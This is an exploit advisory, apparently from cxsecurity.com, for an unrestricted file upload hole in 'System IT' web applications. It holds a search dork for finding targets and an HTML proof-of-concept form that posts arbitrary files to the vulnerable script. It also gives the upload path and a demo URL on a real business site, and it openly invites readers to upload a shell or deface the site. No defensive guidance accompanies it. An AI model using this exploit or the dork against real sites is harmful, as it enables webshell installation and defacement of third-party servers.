System IT Remote File Upload Vulnerability

2020.07.27
ir h4shur (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: System IT Remote File Upload Vulnerability # Author: h4shur # date: 2020-07-27 # Vendor Homepage: systemit.com.au # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Powered by System IT" ### NOTE: * You can bypass it to upload your shell or deface. * ### POC: * Exploit 1 : site.com/fileupload.php <h2>Upload Your File</h2> <form action="site.com/php_sendmail_upload2.php" method="post" name="form1" id="emailForm" enctype="multipart/form-data"> <input class="inputbox" name="fileToUpload" type="file"> <input type="submit" name="Submit" value="Send"> </form> ### Directory File Path : * site.com/upload/[FILE] ### Demo: * http://www.clickprint.com.au/fileupload.php ### Contact Me : * Telegram : @h4shur * Email : h4shursec@gmail.com * Instagram : @netedit0r * twitter : @h4shur


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top